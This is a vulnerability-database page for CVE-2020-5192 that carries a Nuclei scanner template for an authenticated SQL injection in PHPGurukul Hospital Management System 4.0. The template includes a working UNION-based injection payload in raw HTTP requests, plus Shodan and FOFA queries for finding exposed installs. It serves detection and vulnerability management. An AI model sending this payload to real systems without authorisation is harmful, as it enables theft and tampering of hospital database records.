Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-5192
HistoryAug 27, 2022 - 6:49 a.m.

Hospital Management System 4.0 - SQL Injection

2022-08-2706:49:07
ProjectDiscovery
github.com
11
cve
cve2020
hospital management system
sql injection
authenticated
exploit-db
phpgurukul

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9.3

Confidence

High

EPSS

0.311

Percentile

97.1%

Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
id: CVE-2020-5192

info:
  name: Hospital Management System 4.0 - SQL Injection
  author: TenBird
  severity: high
  description: |
    Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0.
  reference:
    - https://www.exploit-db.com/exploits/47840
    - https://phpgurukul.com/hospital-management-system-in-php/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5192
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-5192
    cwe-id: CWE-89
    epss-score: 0.38401
    epss-percentile: 0.97221
    cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: hospital_management_system
    shodan-query: http.html:"hospital management system"
    fofa-query: body="hospital management system"
  tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /hospital/hms/doctor/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}password={{password}}&submit=&submit=
      - |
        POST /hospital/hms/doctor/search.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201d424f2cf825c04dfaf33f4494b47f051148733c2d41705fd3f9b4e2189cd9f0022100a3204a405b34dce8565e1805a20246458e6d8269cbf706a83a8bf55857661418:922c64590222798bb761d5b6d8e72950

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9.3

Confidence

High

EPSS

0.311

Percentile

97.1%

Related for NUCLEI:CVE-2020-5192